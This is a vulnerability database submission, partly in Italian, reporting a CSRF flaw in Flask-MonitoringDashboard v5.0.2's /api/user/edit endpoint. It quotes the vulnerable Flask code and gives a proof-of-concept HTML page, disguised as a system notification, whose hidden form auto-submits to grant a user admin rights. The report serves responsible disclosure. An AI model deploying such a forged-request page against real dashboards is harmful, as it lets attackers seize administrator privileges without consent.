Invia #850879: flask-dashboard Flask-MonitoringDashboard v5.0.2 CSRFinformazioni

Titoloflask-dashboard Flask-MonitoringDashboard v5.0.2 CSRF
Descrizione# CSRF Vulnerability in User Privilege / Password Modification (/api/user/edit) ## Summary A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the dashboard user-edit endpoint `/api/user/edit`. The lack of CSRF protection allows an attacker to force an authenticated administrator to change the admin status of any user (privilege escalation / demotion) without authorization. ## Vulnerability Details ### Configuration-Level Issue **File**: `flask_monitoringdashboard/core/auth.py` ```python def admin_secure(func): @wraps(func) def wrapper(*args, **kwargs): if session and session.get(config.link + '_logged_in'): # ❌ cookie-only authorization if session.get(config.link + '_admin'): return func(*args, **kwargs) return redirect(url_for(config.blueprint_name + '.login')) return wrapper # ❌ No CSRF protection anywhere in the package # ❌ Session cookie has no SameSite attribute enforced ``` ### Endpoint-Level Code Analysis **File**: `flask_monitoringdashboard/views/auth.py` (Lines 99-129) ```python @blueprint.route('/api/user/edit', methods=['POST']) @admin_secure def user_edit(): """Update the user in the database.""" user_id = int(request.form['user_id']) is_admin = request.form['is_admin'] == 'true' # ⚠️ toggle admin flag of any user # ❌ No CSRF token validation # ❌ No Origin/Referer verification with session_scope() as session: user = session.query(User).filter(User.id == user_id).one() user.is_admin = is_admin # ⚠️ privilege escalation/demotion old_password = request.form.get('old_password') if old_password is not None: if user.check_password(old_password): new_password = request.form['new_password'] ... user.set_password(new_password) return 'OK' ``` **Security Issues**: 1. ❌ No CSRF token validation 2. ❌ No origin verification 3. ⚠️ Changes the `is_admin` flag of an arbitrary user without requiring any secret (the `old_password` check only gates the optional password change, not the privilege toggle) ## Proof of Concept (PoC) ```html <!DOCTYPE html> <html> <head> <title>System notification</title> </head> <body> <h2>???? Applying your preferences...</h2> <!-- Promote user_id=3 to admin in the victim admin's context --> <form id="csrf-form" action="http://127.0.0.1:5000/dashboard/api/user/edit" method="POST"> <input type="hidden" name="user_id" value="3"> <input type="hidden" name="is_admin" value="true"> </form> <script> setTimeout(function() { document.getElementById('csrf-form').submit(); }, 1000); </script> </body> </html> ``` ## Impact **Privilege escalation / account tampering** - An attacker can silently promote an attacker-controlled (non-admin) user to admin, or demote legitimate admins, by tricking a logged-in administrator into visiting a page. --- **CVSS Score**: 6.5 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N` **CWE**: CWE-352 (Cross-Site Request Forgery) --- **Reported by**: flashzyc **Date**: 2026-06-07
Fonte⚠️ https://github.com/flask-dashboard/Flask-MonitoringDashboard/issues/559
Utente
 flashzyc (UID 92850)
Sottomissione07/06/2026 09:00 (1 mese fa)
Moderazione08/07/2026 09:39 (1 month later)
StatoDuplicato
Voce VulDB376785 [flask-dashboard Flask-MonitoringDashboard fino a 5.0.2 cross site request forgery]
Punti0

Interested in the pricing of exploits?

See the underground prices here!